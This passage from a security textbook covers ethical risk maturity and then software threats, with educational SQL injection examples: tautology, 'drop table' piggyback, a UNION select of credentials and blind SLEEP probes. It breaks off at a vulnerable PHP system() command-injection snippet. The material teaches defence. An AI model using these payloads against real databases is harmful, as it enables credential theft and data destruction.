7. HHS (2013) HIPAA administrative simplification regulation text. U.S. Department of Health and Human Services Office for Civil Rights, March 2013, pp 59–115, https://www.hhs.gov/ sites/default/files/hipaa-­simplification-­201303.pdf 8. HIPAA Journal (2022a) What is the HITECH act? HIPAA J. https://www.hipaajournal.com/ what-­is-­the-­hitech-­act/ 9. HIPAA Journal (2022b) New HIPAA Regulations in 2022. HIPAA J. https://www.hipaajournal.com/new-­hipaa-­regulations 10. IBM (2022) Cost of a data breach report 2022. IBM Security, Armonk 11. Symantec (2014) Internet security threat report 2014, vol 19. Symantec Corp., Mountain View, April 2014 12. Bitglass (2014) The 2014 Bitglass healthcare breach report. http://pages.bitglass.com/pr2014-healthcare-breach-report.html. Accessed 8 Nov 2014

Chapter 20

Maturing Ethical Risk

The market loves to reward corporations for risk-taking when those risks are largely borne by other parties, like taxpayers. This is known as “privatizing profits and socializing losses.” Standard examples include companies that are deemed “too big to fail,” which means that society as a whole pays for their bad luck or poor business decisions. – Bruce Schneier, author of 14 books and fellow at the Harvard Kennedy School [26]

The pervasive and accepted thought when dealing with cybersecurity is to evaluate risk from the organization’s perspective: the organization protects itself through assessing risk. There may not be equivalent financial incentive to protect employees and customers. Therefore, regulation is necessary to raise the cost of breaches relating to customers and employees  – but companies often have undue influence on governments, preventing substantial cyber-regulation progress. In addition, organizations may make more money by ignoring regulation, not reporting breaches, and paying regulatory fees when exposed. We can surmise that organization-based risk assessment has been inadequate, by evaluating the annual number of breached records in comparison to population size. For many western nations in 2016 it was estimated that rate commonly approached 100% (and was infrequently higher) [28]. Statista also tracks breached records, and documents three cases of breaches where between 1.1 and 11 billion records were exposed [27]. We can use this rate of breaches as a good societal metric to measure the awareness, attention and interest (or its lack) in cybersecurity. Furthermore, for high-cost, low-probability risk, risk methodology recommends that insurance be purchased. However, insurance does not offer preventive or detective controls; simply corrective. Using the example of school shootings in the U.S., traditional risk provides inadequate financial incentive to protect school children [1]. Cyber-insurance, while necessary, can likewise detract from implementing controls. On the positive side, data privacy has introduced risk evaluation at the individual level, broadening risk from its sole organizational focus. It can be argued that to understand even organizational risk well, one must also understand risk at the personal (e.g., customer) and societal levels; one would quantify risk at the personal level to better understand liability, and from the societal level to better understand trends, and both to act as a better citizen in the world.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_20

367

368

20  Maturing Ethical Risk

20.1 Important Concepts It is important to understand what ethics is and what it is not. Ethics is not self-­ serving. Some basic ethical principles that have guided people include: Consequentialism or Utilitarianism  An action is right if it fosters the greatest happiness for the greatest number [35]. Socially responsible actions are those that improve the welfare of society at large. Virtue Ethics  The character of an entity is of greatest concern [2]. A good character avoids vice. Virtue ethics focuses on the internal motivation and asks that we do the right thing, in the right way, for the right reason. One way to select such an action is with respect to a revered person: What would Jesus/Mohammed/Buddha do? Virtue ethics may also extend to the organizational level, by improving internal organizational qualities [3]. Deontological Ethics  A simplification of this philosophy follows the golden rule: do unto others as you would like them to do unto you. However, universal application is important in its application: if everyone did this action, would society benefit [4]? For example, lying and stealing cannot be universally applied to good effect; therefore, these actions are not recommended. Chakrabarty and Bass [3] point out that Deontology may advocate institutional rules that make an organization function well, but lead to organizational actions that do not benefit society.

20.2 Raising Ethical Maturity through an Ethical Risk Framework This chapter considers research relating to developing processes for ethical risk. They are presented in likely order of ethical maturity, expanding from self-serving to concern for compliance, to stakeholder concern.

20.2.1 Raising Self-centered Ethical Concern It is debatable whether self-centered and ethical behavior are compatible concepts. However, it is important in an organization that employees do not steal from it. It is also important that employees can have productive conversations about protecting the organization from risk.

20.2  Raising Ethical Maturity through an Ethical Risk Framework

369

20.2.1.1 Open Communication Management can close down serious risk analysis by avoiding discussing the topic, or by avoiding talking about specific risks deemed not sufficiently important [6]. Also, management may dismiss ethical issues or bad news disrespectfully, thereby losing an opportunity to build better relationships with, and loyalty from, employees. Employees can persistently ask questions: “what should we do if risk X occurs?” Employees can also fail to communicate risk to management. It is very easy to attribute a breach or security incident to “a firewall (or technical) issue” when what could have been described is the difference in security between an older style firewall with a more capable one [11]. Technical employees must learn to discuss issues in business terms. For example, what risk scenarios might occur with the older firewall that would not occur with the newer one, and how might that affect the business financially? Management always has the prerogative of not funding risk after a discussion, but if they do not listen to employees who discuss concerns, they do not consider the full picture. Rank employees may find it difficult that their main concern(s) are not funded. However, in business, a RACI chart diagrams who is Responsible, Accountable, Consulted and Informed in an organization [7]. Risk practitioners are ‘Responsible’ for gathering risk data and writing a risk report; but senior management is ‘Accountable’ in prioritizing risk and deciding on risk controls. After employees have done their best job in documenting and distributing risk reports, and asking for sign-offs, they should not feel accountable for the results. The one exception is when laws are broken or serious harm may occur. The ACM Code of Ethics recommends escalating dangerous risks, after double checking facts. The text Ethics in Information Technology discusses legal recommendations for whistleblowing [9]. 20.2.1.2 Develop a Code of Ethics Without an ethical culture and code of ethics, the organizational level of ethics will vary based upon each employee’s basic moral behavior [10]. A basic control against internal fraud is to differentiate appropriate and inappropriate behavior, both through policy and management example [6]. Organizations can adopt a code of ethics at varying levels of ethical maturity, including the following ethical levels, which build upon each other: • Organizational concern: The employee has fiduciary responsibilities to the organization, related to preventing fraud, theft and misuse. • Compliance concern: The employee shall help the organization adhere to laws and safeguard contracts. • Stakeholder concern: Employees should treat fellow employees, customers, and other stakeholders fairly and honestly. • Societal concern: Employees should act as good world citizens.

370

20  Maturing Ethical Risk

20.2.1.3 Provide an Anonymous Reporting Mechanism for Ethical Violations The Association for Certified Fraud Examiners (ACFE) [8] has, for year after year, regardless of region, found that tip is by far the most common way for fraud to be discovered. On average, 42% of fraud is discovered by tips from employees, customers, anonymous and/or vendors. To enhance this mechanism, make tip reporting readily available and train employees to report fraud.

20.2.2 Adhering to Regulation While adhering to regulation is self-serving, it also recognizes the importance of getting along in society. As mentioned previously, it may be financially profitable to ignore regulation. Therefore, recognizing society’s demands on an organization, and trying to play well legally, are important parts at this level. 20.2.2.1 Address Regulation Fully Organizations can choose to optimize profit over law, versus adhere to law. Within the adhering to law category, organizations may choose to follow a minimal legal compliance or follow the intent of the law. Minimal legal compliance meets only the bare minimum technicality of the law. To fully adhere to a regulation does require evaluating new business opportunities as well as monitoring the law and implementing the regulation appropriately organization-wide, as necessary [14]. Multinational corporations must adhere to the law in all nations they do business in. This may best be accomplished by outlining a baseline standard organization-wide, then adding additional practices for countries needing additional requirements. Additionally, third-party contracts must specify applicable legal requirements. 20.2.2.2 Evaluate Legal Responsibility Beyond Regulation Civil suits arise in cases of tort law, contract law, copyright and patent law. Tort law addresses duty, breach of duty, reasonable care, product liability, punitive damages, and causation/foreseeability [13]. Information Technology’s general concerns include privacy, contracts, intellectual property and product liability. To defend against lawsuits requires due care, which limits risk, through assessing risk and enacting controls. Product liability should be of particular concern for decision support systems, when products automate intelligence for the criminal justice, healthcare, economic and legal systems affecting people’s lives, careers and freedom [12]. Training new

20.2  Raising Ethical Maturity through an Ethical Risk Framework

371

automated systems on traditionally biased past decisions can institutionalize prejudice, leading to justifiable lawsuits. 20.2.2.3 Manage Projects Responsibly When projects fall behind in the schedule, economics may be prioritized over ethics [6], resulting in a series of poor decisions, lies and potential contract lawsuits. The project may cut corners in quality, documentation and/or features, potentially reducing safety or security [15]. Alternatively, the project may be delivered late, resulting in increased costs. Responsible project management builds upon realistic schedules, good communication, quality control, comprehensive risk management, and ethical training and policies.

20.2.3 Respecting Stakeholder Concerns Beyond legal concerns, eventually we come to understand that repeat business and keeping good employees is often crucial to financial viability and survival. Therefore, treating stakeholders with respect, and valuing their business and loyalty, are worthy concerns. To accomplish that, organizations truly need to produce products customers want to buy – and/or provide decent service [21]. 20.2.3.1 Personalize Risk People tend to have a more ethical view of risk, compared to the statistical perspective of risk practitioners. Therefore, it is useful for risk practitioners and businesses to consider the ethical perspectives of risk, putting themselves in a failed risk scenario. An example is that riggers who packed parachutes in the US Army 82nd Airborne Division had to jump from planes with their fellow soldiers with a random parachute [16]. One way to personalize risk is to calculate risk from the customer’s or employee’s perspective. Normally risk is calculated from the organization’s perspective. Risk is then calculated as the impact times the likelihood. To personalize risk, one would calculate risk from the stakeholder’s perspective [18]: Risk customer   Impact customer  Likelihoodcustomer  





Risk that may be deemed particularly unethical includes risks that have multiple characteristics of: exotic, catastrophic, memorable, unfair, not controllable by an individual and originating from an untrustworthy source [20]. In these cases, an outrage factor is added to the risk equation:

372



20  Maturing Ethical Risk

Risk  Impact  Likelihood  Outrage

Furthermore, there is a financial gap between where people value their life and where risk management traditionally estimates the value of life. Traditional estimates consider a person’s earning value to the end of their life, which further minimizes their value in low-income nations [17]. Ethical risk management uses higher values for the value of life; but even then, risk estimates may be too low, such as in the example of school shootings where a very low likelihood leads to a low Annual Loss Expectancy [1]. Considering privacy (by using the Information Privacy chapter) initiates the process for one aspect of stakeholder protection. Other controls for ethical risk include involving persons from the public in risk decisions, to represent the ‘speaker for the absent’ [16]. Representative employees should also be involved in risk decisions and serve on business boards, empowered with pertinent information and the power to negotiate [19]. Ethical risk analysis uses a higher and consistent value of life. Finally, communications can better inform the public, emphasizing what the public does not understand well: technology and statistical realities [20]. 20.2.3.2 Evaluate Trade-offs of Concern Most decisions involve trading off one concern over another. For example, airport gun detectors trade off privacy versus security. Usability and costs are often prime factors; other IT factors include security, privacy, convenience, resilience, adaptability and flexibility [5]. Risk factors can be better understood through discussions with customers and then optimized. For simpler ethical problems, ethical line drawings can be used to discuss and demonstrate trade-offs [22]. Various lines represent different values, where each line has two endpoints, e.g.,: secure versus insecure, or safe versus dangerous. Then for each implementation option, a point on the lines can be chosen to represent the option’s effects. Using this technique, it is possible to contrast different implementations, improve them, and select the best option. For larger projects, a safety standard with full documentation may be required. For example, the American National Standards Institute (ANSI) publishes a document: IEC 61508 Electronic Functional Safety Package, which outlines requirements for an electronic safety-related system. Their process has been used to define specific safe products, including the ISO 26262 standard, which describes functional safety for car designs (hardware and software).

20.2.4 Addressing Societal Concerns Simplistically stated, ethics is concerned with increasing overall happiness (consequentialism), acting in the right way (virtue ethics) and/or with the right motivation, out of duty (deontology). At this level, a concern for the society and the world is

20.2  Raising Ethical Maturity through an Ethical Risk Framework

373

considered, including for marginalized parts of society and the environment. When a broader view of business opportunities and risks is taken, this leads to a better understanding of the future and may lead to prospects for new ideas, services and products. 20.2.4.1 Think Outside the Engineer Role Engineers often focus only on technology implementations, and do not consider the societal implications of their software. This becomes an issue when a recently launched technology enjoys rapid, worldwide adoption but could cause regional or planetary-scale disasters through climate change, nuclear weapons, biological pathogens, malware, and more [23]. There may be implications legally, economically, environmentally, and relating to privacy, safety, misuse, affecting people’s jobs and lives. Therefore, engineers must discuss ethical implications of their work between themselves, with their management, and customers. A fun method to raise awareness is through Friedman and Hendry’s Envisioning Cards [33], which ask questions on topics such as the technology’s international effects, political impacts, effects on children, environment, stakeholders and nonusers. Engineers should address undesirable decisions, such as when a disaster does happen, how to minimize loss of life, and whose life would be spared [34]. Once an understanding of societal implications is understood, it is beneficial to actually calculate societal risk quantitatively [18]. This risk calculation may be particularly useful for larger issues, where the organization or new technology may have a considerable impact: Risk society   Impact society  Likelihood society  





20.2.4.2 Inform of Safety and Security Concerns to Customers Customers (whether internal or external) may need to be informed of safety, security, and ethical concerns. A quantitative risk assessment, focused on the stakeholder, can best help to inform them of what they should be concerned about. This safety consideration is common in the engineering world, and could be matured in the IT world. Expressing concerns of risk can raise the stature of the software development organization to its customers, as well as increase the value of projects, and lower the risk of product liability. At best, organizations can choose their customers (in addition to employees and third-party vendors [6]). At worst, risky liability should be explicitly accepted by the customer. It is also possible to certify products or organizations, using for example, Common Criteria, PCI DSS, and ISO 9000.

374

20  Maturing Ethical Risk

20.2.4.3 Evaluate Unknown Risk The Precautionary Principle [29] suggests addressing technology and scientific risk by catching problems before they arise (pre-damage) as opposed to afterwards (post-damage). It is recommended to apply this principle to plausibly unacceptable hazards, using scientific analysis, and to evaluate the risk at a national level to determine what might be an acceptable level of risk. Such analyses should be written up systematically, potentially using a Social Impact Analysis or Environmental Impact Analysis. Appropriate steps include: (1) screening the project; (2) considering alternative solutions, (3) predicting impact, and (4) reducing undesirable impact via mitigation strategies [25]. The document might include the following sections [24]: • • • •

Summary: describes the controversial issues, problems and major conclusions; Purpose: defines the proposed project and the goals it hopes to achieve; Alternatives: evaluates alternative solutions that can accomplish the goals; Affected Environment: describes areas and issues affected by the alternative solutions; • Consequences: considers both negative and positive, direct and indirect effects and implications of alternative solutions.

20.3 Questions 1. Values Envisioning: Consider two of the following scenarios, with their effects on the world. Discuss how they may affect different groups, including: children, international nations, indirect stakeholders/non-users, political landscape, and society/environment. (a) Drone delivery services (b) Automatically-driven personal planes (c) Pollution monitoring devices for waterways or natural gas wells (d) Chemical-tracking processors installed in brains (e) Automated paper grading 2. Case Study: Consider an organization you currently work in or would like to work in. Assume the organization is in your geographical region. What risks involving the organization might be a concern to the public that management may not be as concerned with? 3. Ethical Line Drawings: A company is considering how it might be possible to develop the project discussed in question 1 or 2. What trade-offs of concern should the project consider? Consider: (a) What values should be evaluated? Consider 3–5 values for the selected project. (b) Draw an ethical line drawing for each value, labeling each endpoint. Place an arrow where you believe the value lies for the project, with no controls.

20.3 Questions

375

(c) Briefly describe controls that can move a value point in a positive direction. Add a new arrow on the ethical line drawing, which considers the addition of the control(s). 4. Envisioning Three Levels of Risk: Evaluate how views of risk may differ between a corporation, a corporation’s customer, and the nation. How might each experience the risk differently? What risk scenarios (or risk stories) might each group tell? Select one of the following scenarios to analyze: (a) Health insurance breach (b) Electric company affected by information warfare (c) A project or risk from question 1 or 2. 5. Ethical Theory Evaluation: Using a project described in question 1 or 2, prepare ethical arguments for additional controls or restricted features. Prepare your arguments using the ethical theories of virtue ethics, deontological ethics, and consequentialism-utilitarianism, labeling each argument with its associated theory. 6. Code of Ethics: Below are selected excerpts from professional organizations’ code of ethics. Label which statements apply to the self-centered, regulation-­ adhering, stakeholder-respecting or societal concerns aspects of a Code of Ethics document. (a) Ensure that the public good is the central concern during all professional computing work. -ACM Code of Ethics and Professional Conduct, Principle 3.1 [30] (b) Strive to achieve high quality on both the processes and products of professional work. -ACM Code of Ethics and Professional Conduct, Principle 2.1 [30] (c) to improve the understanding by individuals and society of the capabilities and societal implications of conventional and emerging technologies, including intelligent systems; IEEE Code of Ethics, Principle 2 [32] (d) to avoid unlawful conduct in professional activities and to reject bribery in all its forms; IEEE Code of Ethics, Principle 4 [32] (e) Support the implementation of, and encourage compliance with, appropriate standards and procedures for the effective governance and management of enterprise information systems and technology, including: audit, control, security and risk management. ISACA Code of Professional Ethics Principle 1 [36] (f) Inform appropriate parties of the results of work performed including the disclosure of all significant facts known to them that, if not disclosed, may distort the reporting of the results. ISACA Code of Professional Ethics Principle 6 [36] (g) A member should also consult the following, if applicable [31]: • The ethical requirements of the member’s state CPA society and authoritative regulatory bodies such as state board(s) of accountancy

376

20  Maturing Ethical Risk

• • • • •

The Securities and Exchange Commission (SEC) The Public Company Accounting Oversight Board (PCAOB) The Government Accountability Office (GAO) The Department of Labor (DOL) Federal, state and local taxing authorities -AICPA Code of Professional Conduct 0.100.020 [31]

References 1. Lincke SJ, Kahn F (2019) Ethical management of risk: active shooters in higher education. J Risk Res 23:1562–1576 2. Aristotle, Irwin T (1985) Nicomachean ethics. Hackett Pub. Co., Indianapolis 3. Chakrabarty S, Erin Bass A (2015) Comparing virtue, consequentialist, and deontological ethics-­based corporate social responsibility: mitigating microfinance risk in institutional voids. J Bus Ethics Springer 126:487–512 4. Kant I, Gregor MJ (1998) Groundwork of the metaphysics of morals. In: Cambridge texts in the history of philosophy. Cambridge University Press, Cambridge, U.K./New York 5. Van de Poel I (2018) Design for change. Ethics and information technology. June 26 2018. https://doi.org/10.1007/s10676-­018-­9461-­9 6. Ames III, Orrin K (2018) The ethical responsibility of leaders to create ethically healthy organizations. Southern Law J XXVIII:261–310 7. ISACA (2015) CRISC review manual, 6th edn. ISACA, Rolling Meadows, p 41 8. ACFE (2020) Report to the nations: 2020 global study on occupational fraud and abuse. Association of Certified Fraud Examiners. Retrieved 6 Aug 2020 from: https://www.acfe.com/ report-­to-­the-­nations/2020 9. Reynolds GW (2018) Ethics in information technology, 6th edn. Cengage, Boston 10. Rossi CL (2010) Compliance: an over-looked business strategy. Int J Soc Econ 37(10)., Emerald Group Publishing Ltd:816–831 11. Schuman E (2020) Rethinking cyber risk. SC Magazine, May 1. From https://www.scmagazine.com/home/security-­news/features/rethinking-­cyber-­risk 12. Altman M, Wood A, Vayena E (2018) A harm-reduction framework for algorithmic fairness. IEEE Security & Privacy, May/June 2018, 34–45 13. Cheng EK (2017) Torts. Law School for Everyone, The Great Courses, Chantilly, pp 282–371 14. ISACA (2018) CRISC practice question database. ISACA, Rolling Meadows 15. Berenbach B, Broy M (2009) Professional and ethical dilemmas in software engineering. IEEE Comput 42:74–80 16. Bodde DL (2014) Ethics and the allocation of risk in engineering design. In: 2014 IEEE international symposium on ethics in science, technology and engineering. 1–6 17. Kahn S (1986) Economic estimates of the value of life. IEEE Technology and Society Magazine, June 1986 18. Lincke SJ, Adavi M (2019) Modeling security risk with three views. 2019 Spring Simulation Conference, Society for Modelling and Simulation International (SCS), published in IEEE and ACM, 29 Apr 2019, Tucson AZ, 1–12 19. OECD (2015) G20/OECD principles of corporate governance. Organisation for Economic Co-operation and Development (OECD), pp 38–39 20. Sandman PM (1987) The Peter Sandman risk communication website. U.S. Environ Protect Agency J Nov 1987:21–22 21. Freeman RE, Harrison JS, Wicks AC (2007) Managing for stakeholders: survival, reputation, and success. Yale University Press, 2007-11-02

References

377

22. Gotterbarn D, Wolf MJ. 2020. Leveraging the ACM code of ethics against ethical snake oil and dodgy development. (Webcast), 8 June 2020. Association for Computing Machinery 23. Green BP (2014) Are science, technology, and engineering now the most important subjects for ethics? Our need to respond. 2014 IEEE International Symposium on Ethics in Science, Technology and Engineering, 1–7 24. EPA (1978) Environmental impact statement. National Environmental Policy Act Review Process. Retrieved Sept 2018 from www.epa.gov/nepa/ national-­environmental-­policy-­act-­review-­process 25. Taebi B, Correlje A, Cuppen E, van de Grift E, Pesch U (2016) Ethics and impact assessments of large energy projects. 2016 IEEE International Symposium on Ethics in Engineering, Science and Technology (ETHICS). IEEE Digital Library, 1–5 26. Schneier B (2021) Why was SolarWinds so vulnerable to a hack? It’s the economy stupid. NY Times, 23 Feb 2021, By Bruce Schneier. https://www.nytimes.com/2021/02/23/opinion/ solarwinds-­hack.html?searchResultPosition=9 27. Petrosyan A (2023) Annual number of data compromises and individuals impacted in the United States from 2005 to 2022. Statista, 24 Feb 2023. From: https://www.statista.com/ statistics/273550/data-­breaches-­recorded-­in-­the-­united-­states-­by-­number-­of-­breaches-­and-­ records-­exposed/ 28. Symantec. (2017) Internet security threat report, Apr 2017, vol. 22 29. UNESCO. 2005. The Precautionary Principle. World Commission on the Ethics of Scientific Knowledge and Technology (COMEST), United Nations Educational, Scientific and Cultural Organization. 2005. retrieved June 9 2016 from: http://unesdoc.unesco.org/ images/0013/001395/139578e.pdf. 30. ACM (2018) ACM Code of Ethics and Professional Conduct, Association for Computing Machinery, New York NY USA. 31. AICPA (2016) AICPA Code of Professional Conduct, American Institute of Certified Public Accountants, Inc, https://us.aicpa.org/ 32. IEEE (2020) Code of Ethics, Institute for Electrical and Electronic Engineers, June 2020, 33. Friedman B and Hendry DG (2012) The Envisioning Cards: A Toolkit for Catalyzing Humanistic and Technical Imaginations Human Factors in Computing (CHI’12), May 5–10, 2012, Austin, Texas, USA, ACM SIGCHI 978-1-4503-1015-4/12/05. pp 1145–1148. 34. Johnsen, Andreas, Gordana Dodig Crnkovic, Kristina Lundqvist, Kaj H¨anninen, and PaulPettersson. (2017). Risk-based decision-making fallacies: Why present functional safety standards are not enough. 2017 IEEE International Conference on Software Architecture Workshops, 153-160. 35. Mill JS, Crisp R (1998) Utilitarianism. Oxford Philosophical Texts. Oxford University Press, Oxford; New York. 36. ISACA (N.D.) Code of Professional Ethics, ISACA, Arlington Heights IL USA, taken from: https://www.isaca.org/credentialing/code-ofprofessional-ethics, date: 18 March 2023.

Part VI

Developing Secure Software

This special section is intended for software engineers to understand their role in the security story. As applications are written daily, this new code has not yet been exposed to the decades of attacks that system software has dealt with. Therefore, it becomes necessary for all software developers to train in secure programming. Regulation in Europe and Canada, and international and industry standards, requires that security and privacy are built into the software – and not added in at the end. It is assumed that the reader is knowledgeable in programming and testing before reading this section. This section is divided into three chapters. Before designing for security, it is important to consider risk. Therefore, Chapter 21 introduces software attacks and vulnerabilities that software engineers must carefully consider mitigating. Chapter 22 addresses the secure software development process, including policy, threat management, configuration management and patching. Chapter 23 outlines engineering techniques for requirements specification and design features for security. These topics are addressed by considering current standards developed and used in industry, including OWASP’s Top 10 most critical web security risks, the Building Security In Maturity Model (BSIMM), and a standard required in the payment card industry, the Software Security Framework.

Chapter 21

Understanding Software Threats and Vulnerabilities

The world soon learned just how neglected OpenSSL had become. The code played a critical role in securing millions of systems, and yet it was maintained by a single engineer working on a shoestring annual budget of $2,000 – most of that donations from individuals – just enough to cover the electric bills. The Heartbleed bug had been introduced in a software update two years earlier and yet, nobody had bothered to notice it.  – Nicole Perlroth (2020, p. 303), author: This is how the tell me the world ends, writing about how OpenSSL was commonly used by Facebook, FBI, Pentagon, Wi-Fi routers, Amazon, Android phones, etc. to encrypt internet traffic [1]

The first step in developing secure software is risk analysis, which requires an understanding of threat analysis. While other attacks addressed earlier in this book describe attacks that definitely apply, this chapter addresses the threats and vulnerabilities specific to software. Some software attacks are introduced or are explained more fully, including buffer overflow, integer/floating point overflows, SQL injection and OS command injection, directory traversal, race conditions, abusing direct object references, network sniffing or otherwise causing a breach of confidential data via lack of secure software. The Building Security In Maturity Model (BSIMM) requires mature organizations to identify potential attackers and attacks specific to the technologies used, such as programming languages and system software. Gathering attack intelligence includes tracking and acting on recent CERT attacks. Generated attack patterns and abuse cases should then be disseminated internally, prioritized and published [9]. We must consider threats not only at the high level, but the deeper technical level. If we consider that a suit of armor protects a knight’s attack surface (by covering nearly his entire body), how can our program also be completely protected? An attack surface analysis considers where newly arising vulnerabilities may lie that have not already been considered. An attack surface minimization considers how features may be turned off, wherever possible, as part of a least privilege implementation [11]. As part of this, error or exception handling must also be carefully designed.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_21

381

382

21  Understanding Software Threats and Vulnerabilities

21.1 Important Concepts and Goals When authentication and access control are not implemented properly, we shall see that attacks may be problematic – and most attacks can be characterized as unauthorized persons accessing outside what they have permissions for. Therefore, here we describe three important design functions related to authorization. Least Privilege  In the software world, least privilege provides program and the user the minimum possible required privileges at time of execution [10, 18]. For example: If a highly privileged operation must be performed, then this privilege shall not be awarded during the entire connection, but only for the single highprivilege operation. Linux’s command ‘sudo’ allows users temporary privileges to perform an administrative task to minimize duration of such privileges. Least privilege is further explained in the chapters on Fraud and Information Security. Complete Mediation  Access rights are completely validated every time an access occurs [10, 19]. This would mean that each web transaction needs to be validated to ensure that the user was properly identified (an active authorization token) and that permission for the requested operation is authorized. Consider that file permissions may change during the time a file is opened, or that user accesses may have time limitations (e.g., first shift), or that a user abusing privileges may need to have permissions suddenly revoked. Complete mediation is a requirement of zero trust (see advanced networks chapter.) Fail Secure Default  Security policy defines that a subject is given explicit access to an object, only when access is explicitly defined, and that authorized use of data and control is restricted by security mechanisms [10, 18]. However, what should happen when the security mechanisms fail? should a service fail open or fail closed when the service aborts? There are two possibilities: • Fail Close or Fail Secure: When a firewall aborts, no packets are allowed through. The alternative, fail open would give access to unauthorized use. • Fail Open or Fail Safe: A locked door opens during a fire. Here, loss of life is given priority over security. Note that Fail Safe may mean Fail Closed [10].

21.2 Threats to Input The Web enables hackers from around the world to attack software internationally from the convenience of wherever the attacker happens to be. Figure 21.1 shows an example form, where data is typed reasonably as string data, and numbers appear not to overflow, but the data is horribly fraudulent. The credit card number includes letters, the phone number is too short (and is an emergency number), the name and

21.2  Threats to Input

383

Fig. 21.1  A car purchase form

address are obviously nonsensical, and the amount paid is too low for a new car. However, social engineers have successfully done attacks like this, and if software validation is not good (or agents are too busy conversing with customers) then fraud like this may not be noticed. Useful input validation techniques include allowlisting, which checks against a list of acceptable input, or blocklisting, which rejects suspect input [3]. An example in Fig. 21.1 is to ensure that the credit card number and most of the address are valid. When this is not possible, data should atleast be correctly typed and the syntax should be checked. Java and other type-safe languages are safer than C/C++, which allow more flexibility in type conversions [3]. Additionally, input should adhere to business rules. For example, a new car price should be within a specific range. Simple business rules specify required and optional input data. The Audit chapter describes other input validation checks that can prevent this type of fraud. Input sanitization should occur using a bullet-proof standardized utility that has survived the test of time. Attacks can occur at raw input stage, such as buffer overflows and integer or floating point overflows [3]. In the case of buffer overflow, the user enters more characters than an input string buffer allows for, causing the buffer to spill over and affecting nearby data. Worse yet, if the overflowing buffer is on the program stack, which could occur with local variables or method parameters, then the method’s return address could be modified, enabling the attacker to jump to their chosen destination [3]. To counter this, it is important to use an input utility, which enables programmers to (correctly) specify the maximum size of the buffer. In the case of integer or floating point overflows, users enter numbers large or small enough to overflow or underflow the bounds of what a computer can store in a normal integer, float, double or other type [3]. This can cause (for example) large integers to appear small or become negative, and cause negative numbers to become positive. This occurs because computer integer arithmetic works in a modulo way, according to the number of bits allocated. Table 21.1 shows how calculations can overflow for a char and int field [13]. Calculated totals are thus subject to underflow and overflow. To counter this, use larger number types (e.g., long or long long) and verify input and output numbers are within specified limits. For example, a total sale

384 Table 21.1  Unexpected char and int operations

21  Understanding Software Threats and Vulnerabilities Data type Signed char

Operation 127 + 1 −128 − 1 Unsigned char 255 + 1 Signed int 2,147,483,647 + 1 −2,147,483,648 – 1 Unsigned int 4,294,967,295 + 1

Result −128 +127 0 −2,147,483,648 +2,147,483,647 0

should not result in a negative number. Also, it is possible for floating point numbers to overflow to ‘infinity’, although larger doubles overflow at larger number sizes. Input from any source shall not be trusted, whether it is from the keyboard, a data transmission, a file, an internal or external process, or an attached device. Any source may become hacked, affecting your code [15]. Any input from an external source should be suspect, including: parameters or arguments, cookies, network packets, environment variables, client request headers/data, query/server results, URL components, e-mail, files and databases [3]. Web attacks may include reading and modifying cookies and causing a victim server to store or execute attacks [12, 16]. In addition, client software can easily be modified, rewritten or spoofed to attack. Their cookies may be modified and web session IDs easily spoofed. If web sessions are maintained by the server, session IDs should time-out and not be easily guessable [16]. Cookies should have the secure attribute set to ensure that any transmissions are encrypted via HTTPS. Since client input validation can easily be circumvented, it is important to sanitize input at the server [3]. Also, when coding with reusable modules, it is important to ensure that all data is checked between different code modules [15]. Good input validation must provide error messages. Error messages should be helpful to the user, but some messages can be too explicit. Chatty error messages tell an attacker about your configuration and internal software operations: e.g., “Cannot find file: C:/users/Lincke/validation.txt” or “Invalid password for login ID”, or “Lab.cs.uwp.edu error: divide by zero”. Error messages should avoid file, network configuration and personal information [3]. Also, be sure to remove debug information before release. Some vulnerabilities do not require an attack, but defects occur due to bad coding practices – and mistakes. A race condition enables attackers to see data from other users or to cause a denial of service attack. A race condition is caused when multiple threads simultaneously access shared data within the same process. Critical sections, implemented with semaphores or monitors, ensure safe access when shared data is required.

21.2  Threats to Input

385

21.2.1 Recognize Injection Attacks Data input may appear correct in length, type and syntax, but still be an attack. One example is the SQL or OS Injection attack, where SQL or OS statements are appended to the form input to attack a database [3]. Specifically, an SQL injection adds conditions or SQL commands as form input, modifying the program’s intended command, to enable the attacker to glean additional information or modify/delete the database. An OS command injection is similar, except that an OS command is appended to the form input, and is possible if the software enables OS access through the database interface. Alternatively, the attacker can add javascript code to the database, to be executed by other customers. Then an infected database can spread an attack to other internal systems and possibly anyone unfortunate enough to click on the website. These dangerous attacks are called cross-site scripting and cross-site request forgery, and are described in more detail in future sections. Some example SQL and injection attacks include: Tautology SQL attack: This attack forces a true condition in the programmed SQL statement [2]. An example attack could modify the following programmed SQL command in PHP code, where ‘username’ and ‘password’ are taken from POST web input: SELECT * FROM users_table WHERE username= “ ’ . $_POST[‘username’] . ‘ “ AND password = “‘ $_POST[‘password’] . ‘“ ‘;

Then assume that the attack password entered was: “Aa’ OR 1 = 1” (input highlighted in bold below). The effect on the programmed SQL statement would then be executed with the second condition always true, meaning that the password would not need to match: “SELECT * FROM users_table WHERE username=‘anyname’ AND password = ‘Aa’ OR 1 = 1”;

Piggyback SQL Attack: In this SQL attack, the user appends a second SQL command as input (highlighted in bold) to alter the programmed SQL command with the result below. This attack is dangerous in that it could remove an entire table. The semicolon separates the first and second commands, while the ending hyphen or -% indicates that anything that follows is a comment or otherwise terminates the command [2]. “SELECT * FROM users_table WHERE username=‘anyname’ AND password = ‘foo; drop table users_table; -’

Union Queries: Query attacks may ask for additional data by appending a UNION SQL statement, such as in this Search query with highlighted input [2]:

386

21  Understanding Software Threats and Vulnerabilities

SQL Result: “SELECT * FROM cars WHERE description LIKE “%” UNION SELECT username, password FROM users; -% ”

Database Structure Queries: Attackers may glean information about the database structure by modifying SQL statements to divulge database metadata. In the first example below, the attacker will learn (with multiple tries) the length of the database name, and when they find a match, all records will print. In the second example, the attacker can determine whether the first character of a database name is ‘B’; if so, there will be a delay in printing [2]. SQL Result: “SELECT name, description FROM cars WHERE description LIKE “%” AND LENGTH (database() = 12); -% ” SQL Result: SELECT * FROM users_table WHERE username= “%“ AND (SELECT SLEEP(10) FROM DUAL WHERE SUBSTRING(database(),1,1)=“B”); --” AND password = “%”;

OS Command Injection: If web software enables a command to be executed at the shell level, then the command can be hijacked. Both C and PHP make available the system() procedure, which executes UNIX or Linux commands. An example PHP attack follows [4, 8]: $userName = $_POST["user"];$command $userName;system($command);

=

'ls

-l

/home/’

.

